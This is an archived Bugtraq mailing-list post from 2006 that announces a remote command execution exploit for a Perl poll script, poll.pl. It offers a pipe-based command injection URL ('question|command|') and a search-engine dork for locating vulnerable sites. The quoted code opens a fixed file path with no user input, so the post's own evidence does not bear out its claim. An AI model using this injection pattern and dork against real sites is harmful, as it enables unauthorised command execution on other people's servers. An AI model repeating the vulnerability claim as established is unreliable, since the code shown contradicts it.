Home page logo
/

bugtraq logo Bugtraq mailing list archives

poll.pl<--remote commands execution exploit
From: CrAzY.CrAcKeR () hotmail com
Date: 26 Apr 2006 02:07:49 -0000

Subject:poll.pl<--remote commands execution 

-----------------<<<<<<<<

foud by:CrAzY CrAcKeR
::::...alshmokh team...::::
Site: http://www.alshmokh.com

-----------------<<<<<<<<

Bug is found in this script:
open (HAND,"/web/htdocs/ronpoll/question") || die "Error opening file polldata $!|n"; 
while (<HAND>) {
  print;
 }
-----------------<<<<<<<<

----example:

http://web/htdocs/ronpoll/question|command|

----Search:

allinurl:"poll.pl"

-----------------<<<<<<<<
E-mail: CrAzY.CrAcKeR () hotmail com
presentation for each separation alshmokh


  By Date           By Thread  

Current thread:
  • poll.pl<--remote commands execution exploit CrAzY . CrAcKeR (Apr 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]